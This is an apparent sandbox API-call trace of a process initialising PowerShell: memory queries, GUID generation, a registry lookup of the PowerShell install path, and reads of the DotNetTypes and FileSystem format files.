	[0411.190] VirtualQuery (in: lpAddress=0xcb530, lpBuffer=0xcc3f0, dwLength=0x30 | out: lpBuffer=0xcc3f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.190] VirtualQuery (in: lpAddress=0xcb530, lpBuffer=0xcc3f0, dwLength=0x30 | out: lpBuffer=0xcc3f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.190] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xe8ee6a1c, Data2=0x5935, Data3=0x42d5, Data4=([0]=0x9b, [1]=0x94, [2]=0x94, [3]=0xb, [4]=0x7b, [5]=0xcd, [6]=0xff, [7]=0xc4))) returned 0x0
	[0411.191] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xafc6e4c1, Data2=0xd623, Data3=0x416b, Data4=([0]=0xba, [1]=0xfd, [2]=0xb6, [3]=0x35, [4]=0x6a, [5]=0xf6, [6]=0x62, [7]=0x9d))) returned 0x0
	[0411.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0411.191] SetErrorMode (uMode=0x1) returned 0x1
	[0411.191] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0411.191] GetFileType (hFile=0x2fc) returned 0x1
	[0411.191] SetErrorMode (uMode=0x1) returned 0x1
	[0411.191] GetFileType (hFile=0x2fc) returned 0x1
	[0411.191] ReadFile (in: hFile=0x2fc, lpBuffer=0x348a5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x348a5b0*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.192] ReadFile (in: hFile=0x2fc, lpBuffer=0x348a5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x348a5b0*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.192] ReadFile (in: hFile=0x2fc, lpBuffer=0x348a5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x348a5b0*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.192] ReadFile (in: hFile=0x2fc, lpBuffer=0x348a5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x348a5b0*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.201] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d05f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2d05f80*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.201] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d05f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2d05f80*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.201] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d05f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2d05f80*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.201] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d05f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2d05f80*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.202] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d05f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2d05f80*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.202] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d05f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2d05f80*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.202] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d05f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2d05f80*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.202] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d05f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2d05f80*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.203] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d05f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2d05f80*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.203] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d05f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2d05f80*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.203] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d05f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2d05f80*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.203] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d05f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2d05f80*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.204] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d05f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2d05f80*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.204] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d05f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2d05f80*, lpNumberOfBytesRead=0xccf98*=0xbce, lpOverlapped=0x0) returned 1
	[0411.205] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d05f0e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2d05f0e*, lpNumberOfBytesRead=0xccf98*=0x0, lpOverlapped=0x0) returned 1
	[0411.205] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d05f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2d05f80*, lpNumberOfBytesRead=0xccf98*=0x0, lpOverlapped=0x0) returned 1
	[0411.205] CloseHandle (hObject=0x2fc) returned 1
	[0411.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0411.205] SetErrorMode (uMode=0x1) returned 0x1
	[0411.205] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf40 | out: lpFileInformation=0xccf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0411.205] SetErrorMode (uMode=0x1) returned 0x1
	[0411.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0411.205] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd028 | out: phkResult=0xcd028*=0x2fc) returned 0x0
	[0411.205] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfac, lpData=0x0, lpcbData=0xccfa8*=0x0 | out: lpType=0xccfac*=0x1, lpData=0x0, lpcbData=0xccfa8*=0x56) returned 0x0
	[0411.205] CoTaskMemAlloc (cb=0x5a) returned 0x1ffce0
	[0411.205] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf7c, lpData=0x1ffce0, lpcbData=0xccf78*=0x56 | out: lpType=0xccf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf78*=0x56) returned 0x0
	[0411.206] CoTaskMemFree (pv=0x1ffce0) 
	[0411.206] RegCloseKey (hKey=0x2fc) returned 0x0
	[0411.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0411.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0411.207] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xcf51e779, Data2=0x2311, Data3=0x4a84, Data4=([0]=0xab, [1]=0xb1, [2]=0x99, [3]=0x6c, [4]=0xb9, [5]=0xec, [6]=0xf, [7]=0x96))) returned 0x0
	[0411.207] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xdf63f6bf, Data2=0xdebc, Data3=0x4610, Data4=([0]=0xb9, [1]=0x4f, [2]=0x1b, [3]=0xd3, [4]=0x6, [5]=0x14, [6]=0x0, [7]=0x24))) returned 0x0
	[0411.208] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xd43c9f04, Data2=0xac45, Data3=0x4519, Data4=([0]=0xa0, [1]=0x77, [2]=0xe0, [3]=0x8c, [4]=0xd1, [5]=0xd1, [6]=0xf8, [7]=0x3d))) returned 0x0
	[0411.208] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x6d4f1d21, Data2=0xea77, Data3=0x4532, Data4=([0]=0x9e, [1]=0xb9, [2]=0x5e, [3]=0x50, [4]=0x66, [5]=0xd6, [6]=0x53, [7]=0xc6))) returned 0x0
	[0411.209] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xd0b227b2, Data2=0x7908, Data3=0x47a2, Data4=([0]=0xb5, [1]=0xa5, [2]=0x50, [3]=0xce, [4]=0x94, [5]=0x79, [6]=0xba, [7]=0xf))) returned 0x0
	[0411.209] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xcf8f9b40, Data2=0x182d, Data3=0x4123, Data4=([0]=0x85, [1]=0x58, [2]=0xda, [3]=0x81, [4]=0xf7, [5]=0x9b, [6]=0x38, [7]=0xe6))) returned 0x0
	[0411.209] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.210] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x48b52628, Data2=0x9180, Data3=0x4a3d, Data4=([0]=0xbf, [1]=0x72, [2]=0x69, [3]=0xee, [4]=0xe, [5]=0xad, [6]=0xc1, [7]=0xfb))) returned 0x0
	[0411.210] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.211] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.212] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x5fb0e885, Data2=0x67c1, Data3=0x44a7, Data4=([0]=0xa7, [1]=0xb0, [2]=0x6f, [3]=0x2f, [4]=0xaf, [5]=0x45, [6]=0x2, [7]=0xb3))) returned 0x0
	[0411.212] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xc8acb6a9, Data2=0x900f, Data3=0x4aff, Data4=([0]=0x88, [1]=0x5e, [2]=0x12, [3]=0xa4, [4]=0x9b, [5]=0x90, [6]=0x80, [7]=0x93))) returned 0x0
	[0411.213] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x81b621d8, Data2=0x80de, Data3=0x4ee9, Data4=([0]=0x8b, [1]=0xeb, [2]=0xb6, [3]=0xf6, [4]=0xc6, [5]=0xb5, [6]=0x86, [7]=0x77))) returned 0x0
	[0411.213] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x9a374bfe, Data2=0x478f, Data3=0x4df1, Data4=([0]=0x96, [1]=0xe6, [2]=0x46, [3]=0xb7, [4]=0x3c, [5]=0x2e, [6]=0x13, [7]=0xec))) returned 0x0
	[0411.213] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.213] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x68a360db, Data2=0xf7f, Data3=0x4b1e, Data4=([0]=0xa5, [1]=0x27, [2]=0xcb, [3]=0x92, [4]=0xa1, [5]=0xf5, [6]=0x86, [7]=0x8c))) returned 0x0
	[0411.213] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.213] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.213] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.213] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.213] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.214] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x187cd592, Data2=0xf5b4, Data3=0x4189, Data4=([0]=0xb8, [1]=0xc7, [2]=0x5c, [3]=0x46, [4]=0xd6, [5]=0x3f, [6]=0x15, [7]=0xee))) returned 0x0
	[0411.214] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x433899a9, Data2=0xb47, Data3=0x479a, Data4=([0]=0xbe, [1]=0xcb, [2]=0x18, [3]=0x57, [4]=0xc7, [5]=0xe6, [6]=0xb1, [7]=0xd2))) returned 0x0
	[0411.214] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xec3860a3, Data2=0xd8e, Data3=0x4ff9, Data4=([0]=0xa2, [1]=0x66, [2]=0x83, [3]=0xab, [4]=0xf6, [5]=0xcb, [6]=0xc4, [7]=0xdb))) returned 0x0
	[0411.214] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xd044d87c, Data2=0x5eb5, Data3=0x404b, Data4=([0]=0x8e, [1]=0xf0, [2]=0x98, [3]=0xbe, [4]=0xeb, [5]=0x73, [6]=0x62, [7]=0x77))) returned 0x0
	[0411.214] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x67bca907, Data2=0xfaec, Data3=0x46f4, Data4=([0]=0x86, [1]=0x45, [2]=0x45, [3]=0x45, [4]=0xee, [5]=0xa3, [6]=0x13, [7]=0xd7))) returned 0x0
	[0411.214] VirtualQuery (in: lpAddress=0xcbec0, lpBuffer=0xccd80, dwLength=0x30 | out: lpBuffer=0xccd80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.214] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xc9fb011c, Data2=0xb55, Data3=0x47dd, Data4=([0]=0x96, [1]=0x3a, [2]=0x63, [3]=0xab, [4]=0x1f, [5]=0x94, [6]=0xbf, [7]=0x67))) returned 0x0
	[0411.214] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xc62df1c4, Data2=0xad23, Data3=0x4985, Data4=([0]=0x86, [1]=0x28, [2]=0x2, [3]=0xd6, [4]=0x3f, [5]=0xe7, [6]=0x29, [7]=0xb))) returned 0x0
	[0411.214] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xadf80da4, Data2=0x2270, Data3=0x402f, Data4=([0]=0x8c, [1]=0x4c, [2]=0x1a, [3]=0x2a, [4]=0xf3, [5]=0x99, [6]=0xbe, [7]=0xe7))) returned 0x0
	[0411.215] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x4e39eed5, Data2=0x2333, Data3=0x401c, Data4=([0]=0xb4, [1]=0x30, [2]=0x5c, [3]=0xf, [4]=0x82, [5]=0xbb, [6]=0x93, [7]=0xaf))) returned 0x0
	[0411.215] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x77c9d2fd, Data2=0xd2cf, Data3=0x4285, Data4=([0]=0xb5, [1]=0xba, [2]=0x9a, [3]=0x97, [4]=0x55, [5]=0x6f, [6]=0xa1, [7]=0x23))) returned 0x0
	[0411.215] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x640ec6b1, Data2=0x28aa, Data3=0x49d3, Data4=([0]=0xb3, [1]=0x86, [2]=0xc4, [3]=0x0, [4]=0x40, [5]=0x69, [6]=0x98, [7]=0xef))) returned 0x0
	[0411.215] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x43208e1a, Data2=0xcca8, Data3=0x4c02, Data4=([0]=0xb4, [1]=0x93, [2]=0x25, [3]=0xe8, [4]=0xb, [5]=0x8b, [6]=0x7a, [7]=0x6a))) returned 0x0
	[0411.215] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xf0599c8b, Data2=0x8488, Data3=0x4c62, Data4=([0]=0x93, [1]=0x95, [2]=0x86, [3]=0xcf, [4]=0xb5, [5]=0xa3, [6]=0x56, [7]=0x75))) returned 0x0
	[0411.215] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xcaa20f7d, Data2=0x6f43, Data3=0x4fc9, Data4=([0]=0x93, [1]=0x38, [2]=0x36, [3]=0x2b, [4]=0xf0, [5]=0xb6, [6]=0xf0, [7]=0x37))) returned 0x0
	[0411.215] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x84d5afb7, Data2=0x2e9c, Data3=0x4971, Data4=([0]=0x97, [1]=0x72, [2]=0x1, [3]=0x10, [4]=0x82, [5]=0x27, [6]=0xd3, [7]=0xb0))) returned 0x0
	[0411.215] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x8caf882a, Data2=0xb599, Data3=0x4219, Data4=([0]=0xbc, [1]=0x85, [2]=0x69, [3]=0xae, [4]=0x27, [5]=0xc2, [6]=0x21, [7]=0x62))) returned 0x0
	[0411.215] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x6c231c2d, Data2=0x9493, Data3=0x4f58, Data4=([0]=0xb3, [1]=0x1, [2]=0x41, [3]=0x9c, [4]=0x69, [5]=0x72, [6]=0x99, [7]=0x56))) returned 0x0
	[0411.215] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x12cdcdb5, Data2=0x494f, Data3=0x46d2, Data4=([0]=0x9b, [1]=0xba, [2]=0xd8, [3]=0x1c, [4]=0x58, [5]=0x16, [6]=0xd9, [7]=0x84))) returned 0x0
	[0411.215] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x6b721638, Data2=0x1251, Data3=0x4e88, Data4=([0]=0x81, [1]=0x83, [2]=0xd7, [3]=0x83, [4]=0xb0, [5]=0x7d, [6]=0xfd, [7]=0x58))) returned 0x0
	[0411.216] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x1e98f997, Data2=0xc481, Data3=0x4905, Data4=([0]=0x9f, [1]=0xd3, [2]=0xda, [3]=0x6, [4]=0x5c, [5]=0xdc, [6]=0x34, [7]=0xbe))) returned 0x0
	[0411.216] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x116ceba8, Data2=0xa887, Data3=0x48d8, Data4=([0]=0x9c, [1]=0x45, [2]=0xb, [3]=0xf9, [4]=0xfb, [5]=0xb2, [6]=0xd6, [7]=0x42))) returned 0x0
	[0411.216] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x6d2a1529, Data2=0xfba0, Data3=0x4c52, Data4=([0]=0x94, [1]=0x48, [2]=0xe9, [3]=0xe, [4]=0x9a, [5]=0x3d, [6]=0x5e, [7]=0x9c))) returned 0x0
	[0411.216] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x9fa39b94, Data2=0x6865, Data3=0x4033, Data4=([0]=0x80, [1]=0x79, [2]=0xb7, [3]=0xda, [4]=0xd3, [5]=0xa7, [6]=0x61, [7]=0x83))) returned 0x0
	[0411.216] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xede2a944, Data2=0xeb8, Data3=0x4deb, Data4=([0]=0x97, [1]=0x20, [2]=0x94, [3]=0x15, [4]=0xd9, [5]=0xe5, [6]=0x26, [7]=0x6a))) returned 0x0
	[0411.216] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.216] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.216] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.217] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x950ce1e0, Data2=0x789b, Data3=0x4214, Data4=([0]=0xb9, [1]=0xe9, [2]=0xfc, [3]=0x30, [4]=0x44, [5]=0xd2, [6]=0x96, [7]=0xbf))) returned 0x0
	[0411.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0411.217] SetErrorMode (uMode=0x1) returned 0x1
	[0411.217] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0411.217] GetFileType (hFile=0x2fc) returned 0x1
	[0411.217] SetErrorMode (uMode=0x1) returned 0x1
	[0411.217] GetFileType (hFile=0x2fc) returned 0x1
	[0411.217] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e0f1e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e0f1e0*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.218] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e0f1e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e0f1e0*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.218] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e0f1e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e0f1e0*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.218] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e0f1e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e0f1e0*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
